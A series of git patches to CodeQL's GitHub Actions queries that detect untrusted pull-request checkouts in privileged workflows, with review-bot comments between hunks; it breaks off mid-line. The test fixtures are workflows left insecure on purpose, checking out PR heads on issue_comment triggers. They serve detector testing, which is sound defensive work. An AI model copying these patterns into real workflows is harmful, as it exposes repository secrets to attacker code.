@@ -79,7 +77,14 @@ abstract class PRHeadCheckoutStep extends Step { } class ActionsCheckout extends PRHeadCheckoutStep instanceof UsesStep { ActionsCheckout() { this.getCallee() = "actions/checkout" and - containsHeadRef(this.getArgumentExpr("ref").getExpression()) + ( + containsHeadRef(this.getArgumentExpr("ref").getExpression()) + or + exists(UsesStep head | + head.getCallee() = ["eficode/resolve-pr-refs", "xt0rted/pull-request-comment-branch"] and + DataFlow::hasLocalFlowExpr(head, this.getArgumentExpr("ref")) + ) + ) } } @@ -103,7 +108,10 @@ class GitCheckout extends PRHeadCheckoutStep instanceof Run { from Workflow w, PRHeadCheckoutStep checkout where - w.hasTriggerEvent(["pull_request_target", "issue_comment", "pull_request_review_comment", "pull_request_review", "workflow_run", "check_run", "check_suite", "workflow_call"]) and + w.hasTriggerEvent([ + "pull_request_target", "issue_comment", "pull_request_review_comment", "pull_request_review", + "workflow_run", "check_run", "check_suite", "workflow_call" + ]) and w.getAJob().(LocalJob).getAStep() = checkout and not exists(ControlCheck check | checkout.getIf() = check or checkout.getEnclosingJob().getIf() = check diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_3rd_party_action.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_3rd_party_action.yml new file mode 100644 index 00000000000..4de47d6f17a --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_3rd_party_action.yml 
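Review bot: The new branch in `ActionsCheckout` accepts any output of `eficode/resolve-pr-refs` or `xt0rted/pull-request-comment-branch` that reaches `ref`, because `DataFlow::hasLocalFlowExpr(head, this.getArgumentExpr("ref"))` does not constrain which output field is read. The added tests only cover `head_ref` and `head_sha`; if these actions also publish base-branch outputs, a checkout of the base ref would be reported as an untrusted checkout. Restricting the field would keep the query precise, along the lines of `exists(StepsExpression e | e = this.getArgumentExpr("ref") and e.getTarget() = head and e.getFieldName() = ["head_ref", "head_sha"])` (types to be confirmed against `Ast.qll`). A short comment on the hard-coded callee list saying why these two actions are treated as PR-head resolvers would also help the next person extending it.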
@@ -0,0 +1,53 @@ +name: PR head from 3rd party action + +on: + workflow_call: + workflow_dispatch: + +jobs: + + test1: + runs-on: ubuntu-20.04 + steps: + - name: (PR comment) Get PR branch + if: ${{ github.event_name == 'issue_comment' }} + uses: xt0rted/pull-request-comment-branch@v2 + id: comment-branch + + - name: (PR comment) Checkout PR branch + if: ${{ github.event_name == 'issue_comment' }} + uses: actions/checkout@v3 + with: + ref: ${{ steps.comment-branch.outputs.head_sha }} + + test2: + runs-on: ubuntu-20.04 + steps: + - name: (PR comment) Get PR branch + if: ${{ github.event_name == 'issue_comment' }} + uses: xt0rted/pull-request-comment-branch@v2 + id: comment-branch + + - name: (PR comment) Checkout PR branch + if: ${{ github.event_name == 'issue_comment' }} + uses: actions/checkout@v3 + with: + ref: ${{ steps.comment-branch.outputs.head_ref }} + + test3: + runs-on: ubuntu-20.04 + steps: + - name: resolve pr refs + id: refs + uses: eficode/resolve-pr-refs@main + with: + token: ${{ secrets.GITHUB_TOKEN }} + + - uses: actions/checkout@v4 + with: + ref: ${{ steps.refs.outputs.head_ref }} + fetch-depth: 0 + - uses: actions/checkout@v4 + with: + ref: ${{ steps.refs.outputs.head_sha }} + fetch-depth: 0 diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_direct.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_direct.yml new file mode 100644 index 00000000000..ece4c02c356 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_direct.yml 
@@ -0,0 +1,46 @@ +name: Direct access + +on: + issue_comment: + types: [created] + +jobs: + test1: + runs-on: ubuntu-latest + if: github.event_name == 'issue_comment' && github.event.issue.pull_request + steps: + - name: Unsafe Code Checkout + uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.ref || github.head_ref }} # Checkout the branch that made the PR or the comment's PR branch + test2: + runs-on: ubuntu-latest + if: github.event.issue.pull_request && github.event.comment.body == '/trigger release' + steps: + - uses: actions/checkout@v4 + with: + ref: refs/pull/${{ github.event.issue.number }}/merge + + test3: + runs-on: ubuntu-latest + if: github.event.issue.pull_request && github.event.comment.body == '/trigger release' + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ format('refs/pull/{0}/merge', github.event.issue.number) }} + + test4: + runs-on: ubuntu-latest + steps: + - name: Checkout Branch + uses: actions/checkout@v4 + with: + ref: ${{ (github.event_name == 'pull_request_review_comment') && format('refs/pull/{0}/merge', github.event.pull_request.number) || '' }} + + test5: + runs-on: ubuntu-latest + steps: + - name: Checkout Branch + uses: actions/checkout@v4 + with: + ref: ${{ github.event_name == 'issue_comment' && format('refs/pull/{0}/merge', github.event.issue.number) || '' }} diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_heuristic.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_heuristic.yml new file mode 100644 index 00000000000..8c0865f598c --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_heuristic.yml 
@@ -0,0 +1,50 @@ +name: Heuristic based + +on: + issue_comment: + types: [created] + +jobs: + test1: + runs-on: ubuntu-latest + steps: + - name: Get Info from comment + uses: actions/github-script@v7 + id: get-pr-info + with: + script: | + const request = { + owner: context.repo.owner, + repo: context.repo.repo, + pull_number: ${{ github.event.issue.number }}, + } + core.info(`Getting PR #${request.pull_number} from ${request.owner}/${request.repo}`) + const pr = await github.rest.pulls.get(request); + return pr.data; + - name: Debug + id: get-sha + run: | + echo "sha=${{ fromJSON(steps.get-pr-info.outputs.result).head.sha }}" >> $GITHUB_OUTPUT + - name: "Checkout ${{ github.ref }} ( ${{ github.sha }} : ${{steps.get-sha.outputs.sha}} )" + uses: actions/checkout@v4 + with: + ref: ${{ steps.get-sha.outputs.sha }} + + test2: + runs-on: ubuntu-latest + + steps: + - name: Detect branch for PR + id: vars + run: | + PR=$( echo "${{ github.event.comment.issue_url }}" | grep -oE 'issues/([0-9]+)$' | cut -d'/' -f 2 ) + PR_INFO=$( curl \ + --request GET \ + --header 'authorization: Bearer ${{ secrets.GITHUB_TOKEN }}' \ + --header 'content-type: application/json' \ + --url https://api.github.com/repos/$GITHUB_REPOSITORY/pulls/$PR ) + REF=$(echo "${PR_INFO}" | jq -r .head.ref) + echo "branch=$REF" >> $GITHUB_OUTPUT + - uses: actions/checkout@v4 + with: + ref: ${{ steps.vars.outputs.branch }} diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit.yml new file mode 100644 index 00000000000..1245d0302fb --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit.yml 
@@ -0,0 +1,114 @@ +name: Octokit (heuristics) + +on: + issue_comment: + types: [created] + +jobs: + test1: + if: github.event.comment.body == '@metabase-bot run visual tests' + runs-on: ubuntu-22.04 + steps: + - name: Fetch issue + uses: octokit/request-action@v2.x + id: fetch_issue + with: + route: GET ${{ github.event.issue.url }} + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + - name: Fetch PR + uses: octokit/request-action@v2.x + id: fetch_pr + with: + route: GET ${{ fromJson(steps.fetch_issue.outputs.data).pull_request.url }} + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + - uses: actions/checkout@v4 + with: + ref: ${{ fromJson(steps.fetch_pr.outputs.data).head.ref }} + token: ${{ secrets.GITHUB_TOKEN }} + - uses: actions/checkout@v4 + with: + ref: ${{ fromJson(steps.fetch_pr.outputs.data).head.sha }} + token: ${{ secrets.GITHUB_TOKEN }} + + test2: + runs-on: ubuntu-latest + steps: + - name: Get Info from comment + uses: actions/github-script@v7 + id: get-pr-info + with: + script: | + const request = { + owner: context.repo.owner, + repo: context.repo.repo, + pull_number: ${{ github.event.issue.number }}, + } + core.info(`Getting PR #${request.pull_number} from ${request.owner}/${request.repo}`) + const pr = await github.rest.pulls.get(request); + return pr.data; + + - name: Debug + id: get-sha + run: | + echo "sha=${{ fromJSON(steps.get-pr-info.outputs.result).head.sha }}" >> $GITHUB_OUTPUT + + - name: "Checkout ${{ github.ref }} ( ${{ github.sha }} : ${{steps.get-sha.outputs.sha}} )" + uses: actions/checkout@v4 + with: + ref: ${{ steps.get-sha.outputs.sha }} + + test3: + if: github.event.comment.body == '@excalibot trigger release' && github.event.issue.pull_request + runs-on: ubuntu-latest + steps: + - name: Get PR SHA + id: sha + uses: actions/github-script@v4 + with: + result-encoding: string + script: | + const { owner, repo, number } = context.issue; + const pr = await github.pulls.get({ + owner, + repo, + pull_number: number, + }); + return 
pr.data.head.sha + - uses: actions/checkout@v2 + with: + ref: ${{ steps.sha.outputs.result }} + + test4: + if: github.event.issue.pull_request && contains(github.event.comment.body, '!bench_parser') + runs-on: ubuntu-latest + steps: + - name: Get PR SHA + id: sha + uses: actions/github-script@v6 + with: + result-encoding: string + script: | + const response = await github.request(context.payload.issue.pull_request.url); + return response.data.head.sha; + - name: Checkout PR Branch + uses: actions/checkout@v3 + with: + ref: ${{ steps.sha.outputs.result }} + + test5: + runs-on: ubuntu-20.04 + steps: + - id: request + uses: octokit/request-action@v2.0.2 + with: + route: ${{ github.event.issue.pull_request.url }} + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + - name: Checkout PR Branch + uses: actions/checkout@v3 + with: + token: ${{ secrets.GITHUB_TOKEN }} + repository: ${{fromJson(steps.request.outputs.data).head.repo.full_name}} + ref: ${{fromJson(steps.request.outputs.data).head.ref}} diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected index 67fcc5555d1..48b7b762605 100644 --- a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected +++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected 
@@ -3,6 +3,12 @@ | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Unpinned 3rd party Action 'Python CI' step $@ uses 'codecov/codecov-action' with ref 'v3', not a pinned commit hash | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Uses Step | | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Unpinned 3rd party Action 'Python CI' step $@ uses 'peter-evans/create-pull-request' with ref 'v5', not a pinned commit hash | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Uses Step: create_pr | | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Unpinned 3rd party Action 'Python CI' step $@ uses 'thollander/actions-comment-pull-request' with ref 'v2', not a pinned commit hash | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Uses Step | +| .github/workflows/issue_comment_3rd_party_action.yml:12:9:17:6 | Uses Step: comment-branch | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref 'v2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:12:9:17:6 | Uses Step: comment-branch | Uses Step: comment-branch | +| .github/workflows/issue_comment_3rd_party_action.yml:26:9:31:6 | Uses Step: comment-branch | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref 'v2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:26:9:31:6 | Uses Step: comment-branch | Uses Step: comment-branch | +| .github/workflows/issue_comment_3rd_party_action.yml:40:9:46:6 | Uses Step: refs | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'eficode/resolve-pr-refs' with ref 'main', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:40:9:46:6 | Uses Step: refs | Uses Step: refs | +| .github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | Unpinned 3rd party Action 'Octokit 
(heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | Uses Step: fetch_issue | +| .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | Uses Step: fetch_pr | +| .github/workflows/issue_comment_octokit.yml:103:9:109:6 | Uses Step: request | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.0.2', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:103:9:109:6 | Uses Step: request | Uses Step: request | | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Uses Step | | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Uses Step | | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Unpinned 3rd party Action 'unpinned_tags.yml' step $@ uses 'foo/bar' with ref 'v1', not a pinned commit hash | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Uses Step | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected index be1c7cbfebd..c7f4e4ad1c2 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected 
@@ -1,4 +1,13 @@ | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_3rd_party_action.yml:17:9:23:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_3rd_party_action.yml:31:9:37:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_3rd_party_action.yml:46:9:50:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_3rd_party_action.yml:50:9:53:25 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_direct.yml:12:9:16:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_direct.yml:20:9:24:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_direct.yml:28:9:32:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_direct.yml:35:9:40:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_direct.yml:43:9:46:126 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/untrusted_checkout.yml:9:7:13:4 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | 
From 22d0600da8d8a58fba75ca358b7e439111af5441 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 14 Mar 2024 13:28:39 +0100 Subject: [PATCH 0107/1267] Support more PR head checkouts --- ql/lib/codeql/actions/Ast.qll | 4 +++- ql/lib/codeql/actions/ast/internal/Ast.qll | 2 ++ ql/src/Security/CWE-829/UntrustedCheckout.ql | 9 +++++++++ .../Security/CWE-829/UntrustedCheckout.expected | 8 ++++++++ 4 files changed, 22 insertions(+), 1 deletion(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 70424a46f95..4a7ff12b4f9 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -232,7 +232,9 @@ abstract class SimpleReferenceExpression extends AstNode instanceof SimpleRefere AstNode getTarget() { result = super.getTarget() } } -class StepsExpression extends SimpleReferenceExpression instanceof StepsExpressionImpl { } +class StepsExpression extends SimpleReferenceExpression instanceof StepsExpressionImpl { + string getStepId() { result = super.getStepId() } +} class NeedsExpression extends SimpleReferenceExpression instanceof NeedsExpressionImpl { } diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 084474b4020..5c6ce37fa92 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -858,6 +858,8 @@ class StepsExpressionImpl extends SimpleReferenceExpressionImpl { this.getEnclosingJob() = result.getEnclosingJob() and result.(StepImpl).getId() = stepId } + + string getStepId() { result = stepId } } /** diff --git a/ql/src/Security/CWE-829/UntrustedCheckout.ql b/ql/src/Security/CWE-829/UntrustedCheckout.ql index a24c80a2f60..f12f1102087 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckout.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckout.ql 
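Review bot: The new `getStepId()` member on `StepsExpression`, and the matching one on `StepsExpressionImpl` in `ast/internal/Ast.qll`, is added without QLDoc even though it becomes part of the public AST API. Judging from `getTarget()`, which matches `result.(StepImpl).getId() = stepId`, it returns the id of the step the expression refers to. A one-line doc such as `/** Gets the id of the step referenced by this expression. */` above both declarations would record that.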
@@ -66,6 +66,7 @@ predicate containsHeadRef(string s) { "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.head\\.sha\\b", "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.id\\b", "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.number\\b", + "\\bhead\\.sha\\b", "\\bhead\\.ref\\b" ], _, _) ) } @@ -80,6 +81,14 @@ class ActionsCheckout extends PRHeadCheckoutStep instanceof UsesStep { ( containsHeadRef(this.getArgumentExpr("ref").getExpression()) or + exists(StepsExpression e | + this.getArgumentExpr("ref") = e and + ( + e.getStepId().matches(["%sha%", "%head%", "branch"]) or + e.getFieldName().matches(["%sha%", "%head%", "branch"]) + ) + ) + or exists(UsesStep head | head.getCallee() = ["eficode/resolve-pr-refs", "xt0rted/pull-request-comment-branch"] and DataFlow::hasLocalFlowExpr(head, this.getArgumentExpr("ref")) diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected index c7f4e4ad1c2..a6f02e7752a 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected 
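Review bot: The step-id/field-name heuristic added to `ActionsCheckout` uses `matches` patterns that are both too wide and too narrow. `%sha%` also matches a `base_sha` output or a step id such as `shared-setup`, and `%head%` matches `header`; `"branch"` has no wildcard and `matches` is case-sensitive, so `pr_branch` or `HEAD_SHA` are missed. Since this disjunct is enough on its own to classify a step as a PR head checkout, I would normalise case and exclude base refs, e.g. `e.getFieldName().toLowerCase().matches(["%sha%", "%head%", "%branch%"]) and not e.getFieldName().toLowerCase().matches("%base%")`, or add a comment if exact `branch` is intended. The generic `"\\bhead\\.sha\\b"` and `"\\bhead\\.ref\\b"` entries added to `containsHeadRef` in the first hunk also subsume the longer `...head.sha` patterns above them, so a comment saying what extra expressions they are meant to catch would help. `containsHeadRef` starts outside the hunk.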
@@ -10,4 +10,12 @@ | .github/workflows/issue_comment_direct.yml:28:9:32:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/issue_comment_direct.yml:35:9:40:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/issue_comment_direct.yml:43:9:46:126 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_heuristic.yml:28:9:33:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_heuristic.yml:48:7:50:46 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_octokit.yml:26:9:30:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_octokit.yml:30:9:35:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_octokit.yml:57:9:62:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_octokit.yml:79:9:83:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_octokit.yml:95:9:100:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_octokit.yml:109:9:114:66 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/untrusted_checkout.yml:9:7:13:4 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | From 778d8978b05267a6b1eed1df7d5e03cb8ea9f8a7 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 14 Mar 2024 13:55:10 +0100 Subject: [PATCH 0108/1267] DF support for untrusted checkout query --- .../dataflow/internal/DataFlowPublic.qll | 1 + ql/src/Security/CWE-829/UntrustedCheckout.ql | 18 ++++++++----- .../issue_comment_3rd_party_action.yml | 1 - .../.github/workflows/untrusted_checkout.yml | 26 ++++++------------- .../CWE-829/UnpinnedActionsTag.expected | 8 +++--- .../CWE-829/UntrustedCheckout.expected | 11 ++++---- 6 files changed, 30 insertions(+), 35 deletions(-) diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll index 8e8ed5d9280..681d6f1cfc3 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll @@ -176,6 +176,7 @@ class FieldContent extends Content, TFieldContent { } predicate hasLocalFlow(Node n1, Node n2) { + n1 = n2 or simpleLocalFlowStep(n1, n2) or exists(ContentSet c | ctxFieldReadStep(n1, n2, c)) } diff --git a/ql/src/Security/CWE-829/UntrustedCheckout.ql b/ql/src/Security/CWE-829/UntrustedCheckout.ql index f12f1102087..1be8a6ea0f5 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckout.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckout.ql 
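Review bot: Adding `n1 = n2 or` makes `hasLocalFlow` reflexive for every caller of the shared data-flow library, not only the untrusted-checkout query this commit targets, and the predicate has no QLDoc stating that. As written it holds for zero or one step (`simpleLocalFlowStep` or `ctxFieldReadStep`) and is not a transitive closure, which the name does not suggest. I would document it, e.g. `/** Holds if n1 and n2 are the same node or a single local flow step leads from n1 to n2. */`. Other users of `hasLocalFlow` and `hasLocalFlowExpr` should be checked for results that now match trivially.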
@@ -79,8 +79,19 @@ class ActionsCheckout extends PRHeadCheckoutStep instanceof UsesStep { ActionsCheckout() { this.getCallee() = "actions/checkout" and ( - containsHeadRef(this.getArgumentExpr("ref").getExpression()) + // ref argument contains the head ref + exists(Expression e | + containsHeadRef(e.getExpression()) and + DataFlow::hasLocalFlowExpr(e, this.getArgumentExpr("ref")) + ) or + // 3rd party actions returning the PR head sha/ref + exists(UsesStep head | + head.getCallee() = ["eficode/resolve-pr-refs", "xt0rted/pull-request-comment-branch"] and + DataFlow::hasLocalFlowExpr(head, this.getArgumentExpr("ref")) + ) + or + // heuristic base on the step id and field name exists(StepsExpression e | this.getArgumentExpr("ref") = e and ( @@ -88,11 +99,6 @@ class ActionsCheckout extends PRHeadCheckoutStep instanceof UsesStep { e.getFieldName().matches(["%sha%", "%head%", "branch"]) ) ) - or - exists(UsesStep head | - head.getCallee() = ["eficode/resolve-pr-refs", "xt0rted/pull-request-comment-branch"] and - DataFlow::hasLocalFlowExpr(head, this.getArgumentExpr("ref")) - ) ) } } diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_3rd_party_action.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_3rd_party_action.yml index 4de47d6f17a..221854ec204 100644 --- a/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_3rd_party_action.yml +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_3rd_party_action.yml @@ -13,7 +13,6 @@ jobs: if: ${{ github.event_name == 'issue_comment' }} uses: xt0rted/pull-request-comment-branch@v2 id: comment-branch - - name: (PR comment) Checkout PR branch if: ${{ github.event_name == 'issue_comment' }} uses: actions/checkout@v3 diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout.yml index a37ceb8f9f6..6bcdcbb4291 100644 
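Review bot: The heuristic disjunct kept at the end of `ActionsCheckout` still requires `this.getArgumentExpr("ref") = e`, while the two disjuncts above it now go through `DataFlow::hasLocalFlowExpr(..., this.getArgumentExpr("ref"))`. A step output that reaches `ref` indirectly, the way the new `ref: ${{ env.HEAD }}` fixture case does for a direct head ref, would presumably be caught by the first disjunct but missed by the heuristic one. Using `DataFlow::hasLocalFlowExpr(e, this.getArgumentExpr("ref"))` there as well would keep the three cases consistent. The comment `// heuristic base on the step id and field name` should read `based on`.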
--- a/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout.yml +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout.yml @@ -3,23 +3,13 @@ on: jobs: build: - name: Build and test runs-on: ubuntu-latest + env: + HEAD: ${{ github.event.pull_request.head.sha }} steps: - - uses: actions/checkout@v2 - with: - ref: ${{ github.event.pull_request.head.sha }} - - - uses: actions/setup-node@v1 - - run: | - npm install - npm build - - - uses: completely/fakeaction@v2 - with: - arg1: ${{ secrets.supersecret }} - - - uses: fakerepo/comment-on-pr@v1 - with: - message: | - Thank you! + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.pull_request.head.sha }} + - uses: actions/checkout@v2 + with: + ref: ${{ env.HEAD }} diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected index 48b7b762605..c3a3ec2f988 100644 --- a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected +++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected 
@@ -3,14 +3,12 @@ | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Unpinned 3rd party Action 'Python CI' step $@ uses 'codecov/codecov-action' with ref 'v3', not a pinned commit hash | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Uses Step | | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Unpinned 3rd party Action 'Python CI' step $@ uses 'peter-evans/create-pull-request' with ref 'v5', not a pinned commit hash | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Uses Step: create_pr | | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Unpinned 3rd party Action 'Python CI' step $@ uses 'thollander/actions-comment-pull-request' with ref 'v2', not a pinned commit hash | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Uses Step | -| .github/workflows/issue_comment_3rd_party_action.yml:12:9:17:6 | Uses Step: comment-branch | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref 'v2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:12:9:17:6 | Uses Step: comment-branch | Uses Step: comment-branch | -| .github/workflows/issue_comment_3rd_party_action.yml:26:9:31:6 | Uses Step: comment-branch | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref 'v2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:26:9:31:6 | Uses Step: comment-branch | Uses Step: comment-branch | -| .github/workflows/issue_comment_3rd_party_action.yml:40:9:46:6 | Uses Step: refs | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'eficode/resolve-pr-refs' with ref 'main', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:40:9:46:6 | Uses Step: refs | Uses Step: refs | +| .github/workflows/issue_comment_3rd_party_action.yml:12:9:16:6 | Uses Step: comment-branch | Unpinned 3rd party Action 'PR head 
